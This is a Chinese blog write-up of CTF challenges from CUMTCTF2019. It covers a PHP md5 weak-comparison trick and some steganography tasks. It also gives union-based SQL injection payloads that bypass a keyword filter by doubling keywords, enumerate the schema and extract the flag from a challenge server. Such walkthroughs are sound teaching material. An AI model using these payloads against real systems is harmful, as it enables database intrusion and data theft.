follow my dream

CUMTCTF2019-FINAL

ctf web sql-injection misc
字数统计: 364阅读时长: 1 min
2019/09/28 Share

加油,xzlxr
cumtbxs

web

签到

tips: seed hash
盲猜md5+弱比较,记得网上有原题
cmd5.la
大致代码

1
2
3
4
5
var_dump(seed == md5(hash));

...

bool(true)
seed hash
0e QNKCDZO

PHP中的Hash校验,应该使用“===”,而不应该使用“==”。另外如果生产环境版本足够高的话(PHP >= 5.6.0),最好使用 hash_equals() 函数。
hash_equals() 在比较两个字符串,无论它们是否相等,函数的时间消耗是恒定的,可以用来防止时序攻击。

SQL注入

骚年,还记得上一次的SQL注入吗?这次加了点东西,Enjoy!
危险urlhttp://120.78.164.84:49098/list.php?id=1 :cold_sweat: 试了很久
应该是preg_replace()
list:union,or,select,flag….
select|union|or|flag|ctf

injection

id=-2' ununionion selselectect 1,database(),3--+
database()= ctf

id=-2' ununionion selselectect 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database()--+
tables:ctf,f1ag1nit
id=-2' ununionion selselectect 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='f1ag1nit'--+
colunms:id,flag
id=-2' ununionion selselectect 1,flag,3 from f1ag1nit--+

MISC

两岁半的猪🐖

用StegSolve.jar
下载使用自行度娘、google
扫二维码就okk了

寻找你的key

推荐子安的wp

委屈的兔兔

后缀改成 txt
在文本最后为HTML转义序列
key{you are right}
key{you are right}

302?还有其他?

待续与后记….

自己还是太菜了,sql盲注,xss,常见的隐写,以及菜到爆的python,子安大佬是真强!!!!!!

原文作者:fe1w0

原文链接:https://fe1w0.github.io/2019/09/28/CUMTCTF2019-FINAL/

发表日期:September 28th 2019, 10:35:59 pm

更新日期:March 15th 2021, 12:20:00 am

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. web
    1. 1.1. 签到
    2. 1.2. SQL注入
      1. 1.2.1. injection
  2. 2. MISC
    1. 2.1. 两岁半的猪🐖
    2. 2.2. 寻找你的key
    3. 2.3. 委屈的兔兔
    4. 2.4. 302?还有其他?
  3. 3. 待续与后记….
Total : 48
2021
2020
2019
ctf web sql-injection ssti python misc cumt Windows PHP-Parser php Struts2 xss labs life flask crypto git Socks Tools c/c++ 流量分析 mysql udf 信安之路 mysql 通达OA fastjson thinkphp 内网渗透 红日靶场 buuctf docker curl weblogic WEB环境搭建 bypass_open_basedir bypass_disable_function
2020-ctf 2020-ctf 2019-ctf 2021-ctf 漏洞复现 PHP XSS life flask git 项目-工具 SQLI 内网渗透 基础知识 upload 环境搭建